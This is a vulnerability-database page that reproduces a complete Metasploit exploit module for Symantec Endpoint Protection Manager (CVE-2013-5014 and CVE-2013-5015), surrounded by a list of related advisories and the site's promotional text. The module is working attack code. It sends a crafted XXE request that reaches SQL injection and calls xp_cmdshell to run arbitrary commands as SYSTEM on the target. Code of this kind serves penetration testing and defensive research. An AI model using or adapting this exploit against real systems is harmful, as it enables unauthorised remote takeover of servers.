Vulners
Lucene search
Symantec Endpoint Protection Manager Remote Command Execution
| Reporter | Title | Published | Views | Family All 36 |
|---|---|---|---|---|
 | Symantec Endpoint Protection Manager Remote Command Execution Exploit | 24 Feb 201400:00 | – | zdt |
| Symantec Endpoint Protection 12.1.4023.4080 - Multiple Vulnerabilities | 6 Nov 201400:00 | – | zdt |
 | CVE-2013-5014 | 23 Feb 201400:00 | – | circl |
| CVE-2013-5015 | 23 Feb 201400:00 | – | circl |
 | Symantec Endpoint Protection Manager XML External Entity Denial Of Service (CVE-2013-5014) | 11 Mar 201400:00 | – | checkpoint_advisories |
 | CVE-2013-5014 | 14 Feb 201402:00 | – | cve |
| CVE-2013-5015 | 14 Feb 201402:00 | – | cve |
 | CVE-2013-5014 | 14 Feb 201402:00 | – | cvelist |
| CVE-2013-5015 | 14 Feb 201402:00 | – | cvelist |
 | Symantec Endpoint Protection Manager 11.0/12.0/12.1 - Remote Command Execution | 23 Feb 201400:00 | – | exploitdb |
10
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/powershell'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include REXML
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Symantec Endpoint Protection Manager Remote Command Execution',
'Description' => %q{
This module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager
versions 11.0, 12.0 and 12.1. When supplying a specially crafted XXE request an attacker
can reach SQL injection affected components. As xp_cmdshell is enabled in the included
database instance, it's possible to execute arbitrary system commands on the remote system
with SYSTEM privileges.
},
'Author' =>
[
'Stefan Viehbock', # Discovery
'Chris Graham', # PoC exploit
'xistence <xistence[at]0x90.nl>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-5014' ],
[ 'CVE', '2013-5015' ],
[ 'EDB', '31853'],
[ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt' ]
],
'Arch' => ARCH_X86,
'Platform' => 'win',
'Targets' =>
[
['Windows VBS Stager', {}]
],
'Privileged' => true,
'DisclosureDate' => 'Feb 24 2014',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(9090),
OptString.new('TARGETURI', [true, 'The base path', '/'])
], self.class)
end
def check
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path),
'method' => 'GET',
})
if res && res.code == 200 && res.body =~ /Symantec Endpoint Protection Manager/ && res.body =~ /1995 - 2013 Symantec Corporation/
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Safe
end
def exploit
print_status("#{peer} - Sending payload")
# Execute the cmdstager, max length of the commands is ~3950
execute_cmdstager({:linemax => 3950})
end
def execute_command(cmd, opts = {})
# Convert the command data to hex, so we can use that in the xp_cmdshell. Else characters like '>' will be harder to bypass in the XML.
command = "0x#{Rex::Text.to_hex("cmd /c #{cmd}", '')}"
# Generate random 'xx032xxxx' sequence number.
seqnum = "#{rand_text_numeric(2)}032#{rand_text_numeric(4)}"
soap = soap_request(seqnum, command)
post_data = Rex::MIME::Message.new
post_data.add_part(soap, "text/xml", nil, "form-data; name=\"Content\"")
xxe = post_data.to_s
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
'method' => 'POST',
'vars_get' => { 'ActionType' => 'ConsoleLog' },
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'data' => xxe,
})
if res and res.body !~ /ResponseCode/
fail_with(Failure::Unknown, "#{peer} - Something went wrong.")
end
end
def soap_request(seqnum, command)
randpayload = rand_text_alpha(8+rand(8))
randxxe = rand_text_alpha(8+rand(8))
entity = "<!ENTITY #{randpayload} SYSTEM \"http://127.0.0.1:9090/servlet/ConsoleServlet?"
entity << "ActionType=ConfigServer&action=test_av&SequenceNum=#{seqnum}&Parameter=';call xp_cmdshell(#{command});--\" >"
xml = Document.new
xml.add(DocType.new('sepm', "[ METASPLOIT ]"))
xml.add_element("Request")
xxe = xml.root.add_element(randxxe)
xxe.text = "PAYLOAD"
xml_s = xml.to_s
xml_s.gsub!(/METASPLOIT/, entity) # To avoid html encoding
xml_s.gsub!(/PAYLOAD/, "&#{randpayload};") # To avoid html encoding
xml_s
end
end
# 0day.today [2018-02-06] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Feb 2014 00:00Current
0.9Low risk
Vulners AI Score0.9
EPSS0.86196